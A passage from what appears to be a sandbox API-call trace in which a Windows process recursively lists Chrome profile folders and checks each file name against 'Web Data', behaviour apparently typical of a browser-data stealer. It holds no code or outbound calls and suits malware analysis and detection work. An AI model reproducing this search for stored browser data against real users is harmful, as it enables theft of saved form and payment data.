lpSrch="Web Data") returned 0x0 [0590.048] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.048] lstrlenW (lpString="\\") returned 1 [0590.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.048] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d0d18 [0590.048] lstrlenW (lpString="data_1") returned 6 [0590.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.048] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5e1e38 [0590.048] LocalFree (hMem=0x5d0d18) returned 0x0 [0590.048] StrStrIW (lpFirst="data_1", lpSrch="Web Data") returned 0x0 [0590.048] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.048] lstrlenW (lpString="\\") returned 1 [0590.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.048] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d0d18 [0590.048] lstrlenW (lpString="data_2") returned 6 [0590.048] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.048] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5a2988 [0590.049] LocalFree (hMem=0x5d0d18) returned 0x0 [0590.049] StrStrIW (lpFirst="data_2", lpSrch="Web Data") returned 0x0 [0590.049] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.049] lstrlenW (lpString="\\") returned 1 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d0d18 [0590.049] lstrlenW (lpString="data_3") returned 6 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5a2ab0 [0590.049] LocalFree (hMem=0x5d0d18) returned 0x0 [0590.049] StrStrIW (lpFirst="data_3", lpSrch="Web Data") returned 0x0 [0590.049] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.049] lstrlenW (lpString="\\") returned 1 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 69 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d0d18 [0590.049] lstrlenW (lpString="index") returned 5 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 70 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x5e1f60 [0590.049] LocalFree (hMem=0x5d0d18) returned 0x0 [0590.049] StrStrIW (lpFirst="index", lpSrch="Web Data") returned 0x0 [0590.049] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0 [0590.049] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.049] LocalFree (hMem=0x59a8a0) returned 0x0 [0590.049] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.049] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.049] lstrlenW (lpString="\\") returned 1 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.049] lstrlenW (lpString="Cookies") returned 7 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5d0d18 [0590.049] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.049] StrStrIW (lpFirst="Cookies", lpSrch="Web Data") returned 0x0 [0590.049] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.049] lstrlenW (lpString="\\") returned 1 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.049] lstrlenW (lpString="Cookies-journal") returned 15 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5a2bd8 [0590.049] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.049] StrStrIW (lpFirst="Cookies-journal", lpSrch="Web Data") returned 0x0 [0590.049] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.049] lstrlenW (lpString="\\") returned 1 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.049] lstrlenW (lpString="Current Session") returned 15 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x59a8a0 [0590.049] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.049] StrStrIW (lpFirst="Current Session", lpSrch="Web Data") returned 0x0 [0590.049] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.049] lstrlenW (lpString="\\") returned 1 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.049] lstrlenW (lpString="Current Tabs") returned 12 [0590.049] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.049] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x571de8 [0590.050] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.050] StrStrIW (lpFirst="Current Tabs", lpSrch="Web Data") returned 0x0 [0590.050] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.050] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2=".") returned 1 [0590.050] lstrcmpiW (lpString1="data_reduction_proxy_leveldb", lpString2="..") returned 1 [0590.050] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.050] lstrlenW (lpString="\\") returned 1 [0590.050] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.050] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.050] lstrlenW (lpString="data_reduction_proxy_leveldb") returned 28 [0590.050] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.050] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0590.050] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.050] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.050] lstrlenW (lpString="\\*.*") returned 4 [0590.050] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.050] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x571f10 [0590.050] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*", lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0x5b9b50 [0590.060] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.060] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.060] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.060] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.060] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.060] lstrlenW (lpString="\\") returned 1 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0590.060] lstrlenW (lpString="000003.log") returned 10 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x150) returned 0x572060 [0590.060] LocalFree (hMem=0x56c300) returned 0x0 [0590.060] StrStrIW (lpFirst="000003.log", lpSrch="Web Data") returned 0x0 [0590.060] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.060] lstrlenW (lpString="\\") returned 1 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0590.060] lstrlenW (lpString="CURRENT") returned 7 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x14a) returned 0x5721b8 [0590.060] LocalFree (hMem=0x56c300) returned 0x0 [0590.060] StrStrIW (lpFirst="CURRENT", lpSrch="Web Data") returned 0x0 [0590.060] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.060] lstrlenW (lpString="\\") returned 1 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0590.060] lstrlenW (lpString="LOCK") returned 4 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x144) returned 0x572310 [0590.060] LocalFree (hMem=0x56c300) returned 0x0 [0590.060] StrStrIW (lpFirst="LOCK", lpSrch="Web Data") returned 0x0 [0590.060] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.060] lstrlenW (lpString="\\") returned 1 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0590.060] lstrlenW (lpString="LOG") returned 3 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x572460 [0590.060] LocalFree (hMem=0x56c300) returned 0x0 [0590.060] StrStrIW (lpFirst="LOG", lpSrch="Web Data") returned 0x0 [0590.060] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.060] lstrlenW (lpString="\\") returned 1 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 92 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0590.060] lstrlenW (lpString="MANIFEST-000002") returned 15 [0590.060] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 93 [0590.060] LocalAlloc (uFlags=0x40, uBytes=0x15a) returned 0x5725b0 [0590.060] LocalFree (hMem=0x56c300) returned 0x0 [0590.061] StrStrIW (lpFirst="MANIFEST-000002", lpSrch="Web Data") returned 0x0 [0590.061] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0 [0590.061] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.061] LocalFree (hMem=0x571f10) returned 0x0 [0590.061] LocalFree (hMem=0x56afc8) returned 0x0 [0590.061] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.061] lstrcmpiW (lpString1="Extension Rules", lpString2=".") returned 1 [0590.061] lstrcmpiW (lpString1="Extension Rules", lpString2="..") returned 1 [0590.061] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.061] lstrlenW (lpString="\\") returned 1 [0590.061] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.061] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.061] lstrlenW (lpString="Extension Rules") returned 15 [0590.061] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.061] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x571f10 [0590.061] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.061] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.061] lstrlenW (lpString="\\*.*") returned 4 [0590.061] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.061] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x59ef10 [0590.061] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*", lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0x5b9b50 [0590.066] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.066] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.066] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.066] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.066] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.066] lstrlenW (lpString="\\") returned 1 [0590.066] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.066] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.066] lstrlenW (lpString="000003.log") returned 10 [0590.066] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.066] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56afc8 [0590.066] LocalFree (hMem=0x59f040) returned 0x0 [0590.066] StrStrIW (lpFirst="000003.log", lpSrch="Web Data") returned 0x0 [0590.066] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.066] lstrlenW (lpString="\\") returned 1 [0590.066] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.066] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.066] lstrlenW (lpString="CURRENT") returned 7 [0590.066] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.067] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x59f170 [0590.067] LocalFree (hMem=0x59f040) returned 0x0 [0590.067] StrStrIW (lpFirst="CURRENT", lpSrch="Web Data") returned 0x0 [0590.067] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.067] lstrlenW (lpString="\\") returned 1 [0590.067] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.067] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.067] lstrlenW (lpString="LOCK") returned 4 [0590.067] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.067] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x59f2a8 [0590.067] LocalFree (hMem=0x59f040) returned 0x0 [0590.067] StrStrIW (lpFirst="LOCK", lpSrch="Web Data") returned 0x0 [0590.067] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.067] lstrlenW (lpString="\\") returned 1 [0590.067] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.067] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.067] lstrlenW (lpString="LOG") returned 3 [0590.067] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.067] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x59f3e0 [0590.067] LocalFree (hMem=0x59f040) returned 0x0 [0590.067] StrStrIW (lpFirst="LOG", lpSrch="Web Data") returned 0x0 [0590.067] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.067] lstrlenW (lpString="\\") returned 1 [0590.067] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 79 [0590.067] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.067] lstrlenW (lpString="MANIFEST-000001") returned 15 [0590.067] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 80 [0590.067] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0590.067] LocalFree (hMem=0x59f040) returned 0x0 [0590.067] StrStrIW (lpFirst="MANIFEST-000001", lpSrch="Web Data") returned 0x0 [0590.067] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0 [0590.067] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.067] LocalFree (hMem=0x59ef10) returned 0x0 [0590.067] LocalFree (hMem=0x571f10) returned 0x0 [0590.067] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.067] lstrcmpiW (lpString1="Extension State", lpString2=".") returned 1 [0590.068] lstrcmpiW (lpString1="Extension State", lpString2="..") returned 1 [0590.068] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.068] lstrlenW (lpString="\\") returned 1 [0590.068] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.068] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.068] lstrlenW (lpString="Extension State") returned 15 [0590.068] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.068] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x571f10 [0590.068] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.068] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.068] lstrlenW (lpString="\\*.*") returned 4 [0590.068] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.068] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x59ef10 [0590.068] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*.*", lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0x5b9b50 [0590.070] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.070] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.070] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.070] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.070] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.070] lstrlenW (lpString="\\") returned 1 [0590.070] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.070] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.070] lstrlenW (lpString="000003.log") returned 10 [0590.070] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.070] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56b3a0 [0590.070] LocalFree (hMem=0x59f040) returned 0x0 [0590.070] StrStrIW (lpFirst="000003.log", lpSrch="Web Data") returned 0x0 [0590.070] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.071] lstrlenW (lpString="\\") returned 1 [0590.071] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.071] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.071] lstrlenW (lpString="CURRENT") returned 7 [0590.071] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.071] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x59f510 [0590.071] LocalFree (hMem=0x59f040) returned 0x0 [0590.071] StrStrIW (lpFirst="CURRENT", lpSrch="Web Data") returned 0x0 [0590.071] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.071] lstrlenW (lpString="\\") returned 1 [0590.071] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.071] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.071] lstrlenW (lpString="LOCK") returned 4 [0590.071] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.071] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x59f648 [0590.071] LocalFree (hMem=0x59f040) returned 0x0 [0590.071] StrStrIW (lpFirst="LOCK", lpSrch="Web Data") returned 0x0 [0590.071] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.071] lstrlenW (lpString="\\") returned 1 [0590.071] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.071] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.071] lstrlenW (lpString="LOG") returned 3 [0590.071] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.071] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x59f780 [0590.071] LocalFree (hMem=0x59f040) returned 0x0 [0590.071] StrStrIW (lpFirst="LOG", lpSrch="Web Data") returned 0x0 [0590.071] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.071] lstrlenW (lpString="\\") returned 1 [0590.071] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 79 [0590.071] LocalAlloc (uFlags=0x40, uBytes=0x122) returned 0x59f040 [0590.071] lstrlenW (lpString="MANIFEST-000001") returned 15 [0590.071] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 80 [0590.071] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56b8c0 [0590.071] LocalFree (hMem=0x59f040) returned 0x0 [0590.071] StrStrIW (lpFirst="MANIFEST-000001", lpSrch="Web Data") returned 0x0 [0590.071] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0 [0590.071] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.072] LocalFree (hMem=0x59ef10) returned 0x0 [0590.072] LocalFree (hMem=0x571f10) returned 0x0 [0590.072] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.072] lstrcmpiW (lpString1="Extensions", lpString2=".") returned 1 [0590.072] lstrcmpiW (lpString1="Extensions", lpString2="..") returned 1 [0590.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.072] lstrlenW (lpString="\\") returned 1 [0590.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.072] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.072] lstrlenW (lpString="Extensions") returned 10 [0590.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 64 [0590.072] LocalAlloc (uFlags=0x40, uBytes=0x116) returned 0x571f10 [0590.072] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.072] lstrlenW (lpString="\\*.*") returned 4 [0590.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.072] LocalAlloc (uFlags=0x40, uBytes=0x11e) returned 0x59ef10 [0590.072] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*", lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 0x5b9b50 [0590.072] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.072] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.072] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.072] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.072] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d928 | out: lpFindFileData=0x52d928) returned 1 [0590.072] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0590.072] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0590.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.072] lstrlenW (lpString="\\") returned 1 [0590.072] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 74 [0590.072] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x59f038 [0590.072] lstrlenW 